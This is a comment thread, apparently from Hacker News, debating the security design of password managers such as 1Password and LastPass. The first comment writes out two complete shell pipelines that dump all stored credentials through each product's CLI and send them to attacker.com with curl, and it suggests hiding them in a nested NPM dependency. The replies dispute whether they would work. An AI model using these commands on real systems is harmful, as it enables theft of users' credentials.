Comment by lrvick

2 days ago

Who needs root? You seem to be under the impression the status quo password managers are reasonably secure for anyone, technical or otherwise.

Exfiltrate all plaintext credentials from 1password:

op list items \

  | jq -r '.[].uuid' \

  | xargs -n1 bash -c 'op get item "$1"' -- \

  | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1

Exfiltrate all plaintext credentials from lastpass:

lpass ls \

  | grep -oP '(?<=id: )([0-9]+)' \

  | xargs -n1 bash -c 'lpass ls | grep "id: $1]"; lpass show $1' -- \

  | curl -F 'p=<-' https://attacker.com >/dev/null 2>&1

Stick one of those in a dependency of a dependency of a dependency of a popular NPM package and you can get access to developer accounts at every sector of the tech industry.

Super easy to avoid with minimal change to user experience, and yet no one did because "no one else does".

Except for Mooltipass and Password Store, which unfortunately no one has heard of. It is the popular options with billions of dollars not doing the basics the niche open source ones do that is so unforgivable.

I just wish to not see others repeating those mistakes and putting users at increased risk for no reason. I know someone personally who had their savings account wiped out because malware dumped their lastpass database. A malicious browser plugin to sniff the master password is all it takes without a hardware anchor.

You have to both install and explicitly enable the 1Password CLI, both steps no “normal” user is going to take unless socially engineered to.

https://www.1password.dev/cli/get-started

And getting secrets using it requires explicit authentication with password/fingerprint/etc (I forget if it’s per item or per process, but still).

  • Those are of course just minimum viable proofs of concept for users with the CLI installed because they are succinct. Real malware could of course install the CLIs for the user helpfully or just directly access the database the next time it is unlocked and dump everything just as easily. A malicious browser plugin to dump the master password to bulk decrypt works just as well.

    Decrypting -all- passwords any time you decrypt -any- password under the hood is an irresponsible design for a password manager, especially on modern hardware with so so so many other options that enforce rate limiting, hardware anchored encryption, and physical user consent.

    Performative 2FA for every secret like 1password does when the binary has direct access to bulk decrypt all secrets in plain text with a key in system memory is a very strange choice given you could just have the hardware doing the individual decryption for a single secret instead of exposing the secrets that can bulk decrypt the whole database.

    • Well, they’re not minimum-viable if they don’t work, which they won’t for most users. It’s not a simple matter of the database being unlocked or locked, as I say it’s at least a per-process authentication, protected by the 1Password daemon. I’m not saying it’s a perfect system, but exaggerated mischaracterisation, with no apparent thought to the experience of the average user, doesn’t help your argument. You don’t seem to put much value in memory protection or process sandboxing. Yes with enough exploits you can do anything, but that’s true in any case. The fact is, 1Password is good enough for most people, and even at least one bank that I’m aware of. I’m willing to be convinced of a better implementation, but the fact you’re so scathing of something that works and has UX benefits over per-secret keying is off-putting. All design is trade-offs.

While figuring out how to set up credential management for AI, I discovered 1Password CLI, and it terrifies me how it requires giving full account access for 10 minutes to the entire terminal! They seem to think the terminal environment should be treated the same as an app running with macOS protections, and that it's expected user experience to match how the GUI app operates. [1] I think that posture is wildly irresponsible, and that the 1Password GUI authorization dialog should specify and allow access only once to the items requested from CLI.

I don't understand why anyone would use LastPass. [2]

[1] https://www.1password.community/developers-69/security-conce... [2] https://en.wikipedia.org/wiki/LastPass#Security_incidents